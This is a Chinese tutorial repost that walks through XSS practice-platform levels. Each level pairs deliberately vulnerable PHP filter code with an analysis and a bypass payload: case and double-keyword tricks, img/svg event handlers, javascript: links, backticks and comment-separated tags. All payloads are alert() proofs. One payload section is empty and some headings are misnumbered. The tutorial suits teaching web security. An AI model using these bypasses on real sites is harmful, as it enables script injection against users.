专栏首页农夫安全浅析XSS的几种测试方法

浅析XSS的几种测试方法

0x00 背景

最近看到一个好玩的xss社区,准备通过几个经典的关卡来剖析一下XSS,本文仅提供经典案例。

试玩链接:http://tr.secevery.com/xss_platform/code/xss01/index.php?name=1

0x01 经典一(未过滤)

一、代码片段

<?php ini_set('display_errors', 0); if (isset($_GET['name'])) { $str = $_GET['name']; echo "<h2>你好:".$str.'</h2>'; } else { echo "<h2>Please add parameters name.</h2>"; } ?>

二、分析

通过GET传递进来的name未做过滤,直接输入,因此引发XSS

三、构造payload

name=<script>alert(1)</script>

0x01 经典二(大小写绕过)

一、代码片段

<?php 
    ini_set("display_errors", 0);
    $str = @$_POST["keyword"];
    $str = str_replace('script', '', $str);
    echo '
    <form action="index.php" method="POST">
    <input name=keyword size=60 value="'.$str.'">
    <input type=submit name=submit value="Search"/>
    </form>';
    echo '<p>No results for "<b>'.htmlspecialchars($str).'</b>"</p>';
?>

二、分析

通过post传递进来的keyword进行了关键词过滤,因此通过大小写可以绕过(也可其他姿势,此处主要讲解大小写绕过)

三、构造payload

0x02 经典三(img标签绕过)

一、代码片段

<?php 
    ini_set("display_errors", 0);
    $str = strtolower(@$_POST["keyword"]);
    $str = str_replace('script', '', $str);
    echo '
    <form action="index.php" method="POST">
    <input name=keyword size=60 value="'.$str.'">
    <input type=submit name=submit value="Search"/>
    </form>';
    echo '<p>No results for "<b>'.htmlspecialchars($str).'</b>"</p>';
?>

二、分析

此处不仅大小写过滤,而且替换了script关键词为空,<script>标签不能用可使用其他标签绕过

三、构造payload

keyword="><img src=# onerror="alert(1)"><"

0x03 经典四(二次绕过)

一、代码片段

<?
$xss=$_GET['x'];
$xss=preg_replace("/script/i","",$xss);
echo 'hello:',$xss;
?>

二、分析

get传递过来的参数大小写都过滤了,此处只替换一次关键词,因为可以使用script关键词两次从而达到绕过。

(此处有其他姿势,但主要讲解二次绕过姿势)

三、构造payload

x=<SCRscriptIPT>alert(1)</SCscriptRIPT>

0x04 经典五(A标签配合javascript绕过)

一、代码片段

<?php 
    ini_set("display_errors", 0);
    $str = strtolower(@$_POST["keyword"]);
    while (strpos($str,'<script>')) {$str = str_replace('<script>', '', $str);}
    while (strpos($str,'on')) {$str = str_replace('on', '', $str);}
    echo '
    <form action="index.php" method="POST">
    <input name=keyword size=60 value="'.$str.'">
    <input type=submit name=submit value="Search"/>
    </form>';
    echo '<p>No results for "<b>'.htmlspecialchars($str).'</b>"</p>';
?>

二、分析

post传递过来的参数,进行了关键标签过来,并且调用事件的on关键词也过滤掉。此处可调用a标签,通过点击a标签重定向导致XSS

三、构造payload

keyword="><a href=javascript:alert(1)>xss me</a><"

0x05 经典六(SVG标签绕过)

一、代码片段

<?php ini_set("display_errors", 0); $str = strtolower(@$_POST["keyword"]); while (strpos($str,'script')) {$str = str_replace('script', '', $str);} while (strpos($str,'<img')) {$str = str_replace('<img', '', $str);} while (strpos($str,'<a')) {$str = str_replace('<a', '', $str);} echo ' <form action="index.php" method="POST"> <input name=keyword size=60 value="'.$str.'"> <input type=submit name=submit value="Search"/> </form>'; echo '<p>No results for "<b>'.htmlspecialchars($str).'</b>"</p>'; ?>

二、分析

post传递过来的参数,进行了关键标签过滤,但是仔细发现没有过滤svg标签

三、构造payload

keyword="><svg src=x onclick=alert(1)></svg><"

点击之后弹框

0x06 经典五(括号过滤猥琐绕过)

一、代码片段

<?php ini_set("display_errors", 0); $str = strtolower(@$_POST["keyword"]); while (strpos($str,'script')) {$str = str_replace('script', '', $str);} $str = str_replace('(', '', $str); $str = str_replace(')', '', $str); echo ' <form action="index.php" method="POST"> <input name=keyword size=60 value="'.$str.'"> <input type=submit name=submit value="Search"/> </form>'; echo '<p>No results for "<b>'.htmlspecialchars($str).'</b>"</p>'; ?

二、分析

post传递过来的参数,进行了关键标签过滤,但是仔细发现没有过滤svg标签,但是奇葩的过滤了括号,但是可用反引号替代

三、构造payload

keyword="><svg src=x onclick=alert`1`></svg><"

0x07 经典六(空格注释绕过)

一、代码片段

<?php ini_set("display_errors", 0); $str = strtolower(@$_POST["keyword"]); while (strpos($str,'script')) {$str = str_replace('script', '', $str);} $str = str_replace('(', '', $str); $str = str_replace(')', '', $str); $str = str_replace(' ', '', $str); echo ' <form action="index.php" method="POST"> <input name=keyword size=60 value="'.$str.'"> <input type=submit name=submit value="Search"/> </form>'; echo '<p>No results for "<b>'.htmlspecialchars($str).'</b>"</p>'; ?>

二、分析

post传递过来的参数,进行了关键标签过滤,并且过滤(),甚至还TM的过滤了空格,简直丧心病狂

三、构造payload

keyword="><img/**/ src="x/**/"onclick=alert`1`><"

keyword="><img/src='1'/onerror=alert`0`><"

keyword="><<svg/onload=alert`1`><"

0x08 经典七(input标签里绕过)

一、代码片段

<?php ini_set("display_errors", 0); $str = strtolower(@$_POST["keyword"]); $str = preg_replace("/<.*?>/", '', $str); echo ' <form action="index.php" method="POST"> <input name=keyword size=60 value="'.$str.'"> <input type=submit name=submit value="Search"/> </form>'; echo '<p>No results for "<b>'.htmlspecialchars($str).'</b>"</p>'; ?>

二、分析

post传递过来的参数,进行正则匹配过滤,过滤所有标签

三、构造payload

<input type=image src=x onerror=alert(1)> 这个payload会把input当做img标签来用 此处用 " type=image src=x onerror=alert(1) " 闭合前后双引号,构造即可

keyword=" type=image src=x onerror=alert(1) "

0x08 经典八(输出直接在可执行JS代码里面)

一、代码片段

<?php ini_set("display_errors", 0); echo ' <form action=index.php method=POST> <input name=link size=60 value=""> <input type=submit name=submit value="add link" /> </form>'; echo '<div></div>'; if (isset($_POST['link'])) { $str = strtolower(@$_POST["link"]); $str=str_replace('"','"',$str); $str=str_replace("'",''',$str); echo '<div><a href="'.$str.'">Link</a></div>'; } ?>

二、分析

本实例post传递过来的参数,输出在a标签里面,直接调用js代码可弹框

三、构造payload

link=javascript:alert(1)

本文分享自微信公众号 - 网络安全社区悦信安(yuexin_an),作者:yuexin_an

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-09-18

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 盘点目前市面上流行的网络攻击

    ? 一、攻击分类 主动攻击 主动攻击会导致某些数据流的篡改和虚假数据流的产生。这类攻击可分为篡改、伪造消息数据和终端(拒绝服务)。 ? ? (2)窃听 ...

    用户1467662
  • docker小试牛刀之bash_shellshock漏洞复现

    漏洞名称 bash_shellshock • 首先,问题起因于一个命令ENV。 • 原型: • env [OPTION]...[NAME=VALUE]......

    用户1467662
  • android客户端渗透测试案例一

    ? android客户端渗透测试案例一 本文为网络收集,如有侵权联系删除,仅供学习使用 0x01 Root root的话直接看私有文件就可以了,做个简单加...

    用户1467662
  • Shell 读取文件 截取字符串

    问天丶天问
  • Day17.String字符串处理库

    解题关键:切片方法的应用。切片是字符串中很重要的一部分,其操作方法和元组、字典等都类似,大家一定要掌握。

    DataScience
  • 输入数字n然后输出0到n的全排列

    用户6055494
  • Mirai新变体Mukashi分析

    CVE-2020-9054 PoC于上个月公开发布后立即被用来感染Zyxel NAS设备。Mirai新变体Mukashi暴力使用不同组合的默认凭据强制登录,将登...

    FB客服
  • 性能优化小技巧-消除低效循环,让你的程序快到飞起

    但是由于编译器的优化非常小心,它必须确保优化前后执行的效果是保持一致的,因此有些时候它会变得保守,并不能帮你优化太多。

    编程珠玑
  • Python3 与 C# 基础语法对比(String专栏)

    Python3 与 C# 基础语法对比:https://www.cnblogs.com/dotnetcrazy/p/9102030.html

    逸鹏
  • Python3 与 C# 基础语法对比(String专栏)

    Python3 与 C# 基础语法对比:https://www.cnblogs.com/dotnetcrazy/p/9102030.html

    逸鹏

扫码关注云+社区

领取腾讯云代金券